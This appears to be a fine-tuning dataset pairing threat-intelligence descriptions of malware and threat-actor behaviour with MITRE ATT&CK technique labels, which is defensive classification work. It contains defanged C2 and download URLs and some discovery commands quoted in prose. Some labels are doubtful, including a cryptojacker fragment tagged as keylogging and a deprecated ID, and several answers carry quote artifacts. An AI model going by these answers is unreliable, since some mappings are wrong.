- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc registers itself as a service on the victim’s machine to run as a standalone process."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic. BRONZE BUTLER has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly dropped and executed SecretsDump, a tool that dumps password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stores configuration values under the Registry key HKCU\\Software\\Microsoft\\[dllname] and modifies Registry keys under HKCR\\CLSID\\...\\InprocServer32with a path to the launcher."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali has been delivered as malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These digital certificates are often issued in the name of rogue and legitimate companies to avoid arousing suspicion from researchers and incident responders"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has used Registry run keys to establish persistence for the RTM Trojan and other tools, such as a modified version of TeamViewer remote desktop software."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer can use TCP to communicate with command and control servers."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy can collect keyboard events."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux can attempt to find a new C2 server if it receives an error."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can communicate over a reverse proxy using SOCKS5."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "23 Take screenshot, temporarily store it as TPX499.dat, and upload it to the C2"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility. More information on this technique and the CARROTBAT malware family may be found within the Appendix"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands \"net group Exchange Trusted Subsystem /domain\" and \"net group domain admins /domain\"."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The stage’s 0x102 resource is parsed and the files are dropped in either %ProgramFiles% or %AppData% in the randomly chosen folder. The creation times are changed to have the same values as kernel32.dll"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Later in the execution chain, the SeLoadDriverPrivilege is used to load the extracted driver. Then one of the four drivers is dropped, after which the Volume Shadow Copy (VSS) service – which allows backups to be performed – is stopped"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used regsvr32.exe to execute scripts."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The MSIL file contains the packed core payload in its .Net resource section"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has had null characters padded in its malicious DLL payload."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can use encrypted string blocks for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver collects the victim's IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence. Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe is capable of executing commands via cmd."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files: NOP sled composed of 0x90 and 0x91 opcodes The main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1027 - Obfuscated Files or Information', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can use HTTPS for communication with C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication"
- },
- {
- "role": "assistant",
- "content": "T1090.004 - Domain Fronting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A FinFisher variant uses DLL search order hijacking."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can decode its encoded PE file prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Those files are then uploaded via unencrypted HTTP, one after another. Examining the network packets showed that they contained a string with two pieces of information: a file path and a random string of characters"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Panda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files. We have identified two infection chains: in one, an .XLSM attachment contains macros that download a loader (Figure 1). Then, the loader downloads and executes the main stealer. "
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1137.001 - Office Application Startup: Office Template Macros."
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DropBook can download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has many names in the information security industry — it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them"
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot collects a list of install programs and services on the system’s machine."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type has used Windows API calls, including `NetUserAdd` and `NetUserDel`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has obtained and used tools such as Putty, SNScan, and PsExec for its operations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader’s version"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis has the ability to create and execute commands in a remote shell for CLI."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has accessed files to gain valid credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has used MsiExec.exe to automatically execute files."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PsExec has the ability to remotely create accounts on target systems."
- },
- {
- "role": "assistant",
- "content": "T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The process identifiers or PIDs to be hidden are stored in the shared memory \"Global\\<computer_name>.\" If the shared memory doesn't exist, it takes the PID embedded by the first-stage shellcode. In this case, the intention of the malicious code is to hide Waterbear’s backdoor activities from the security product. Therefore, the first-stage shellcode takes the PID of the Windows Service — which the first-stage shellcode and the succeeding backdoor both inject into — hides the target process, and embeds that PID into the second-stage shellcode"
- },
- {
- "role": "assistant",
- "content": "T1055.003 - Thread Execution Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WinMM sets a WH_CBT Windows hook to search for and capture files on the victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has exfiltrated victim information using FTP."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UPPERCUT uses cmd.exe to execute commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions"
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto has the capability to use \"rm -rf\" to remove folders and files from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UACMe contains many methods for bypassing Windows User Account Control on multiple versions of the operating system."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used a tool to run `cmd /c wmic computersystem get domain` for discovery."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious has the ability to use Visual Basic scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has used SSL to connect to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim’s computer to mine cryptocurrency"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging', 'T1557 - Adversary-in-the-Middle"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WMIC is a good tool for managing windows hosts and is widely favored by desktop administrators"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named “readme.png”; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This result is committed to the remote repo under the metafiles directory with a filename denoting the time at which the module was executed. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ducktail has now replaced the older NET Core information-stealing malware used in previous campaigns with one written in PHP."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer uses a custom port scanner to map out a network."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
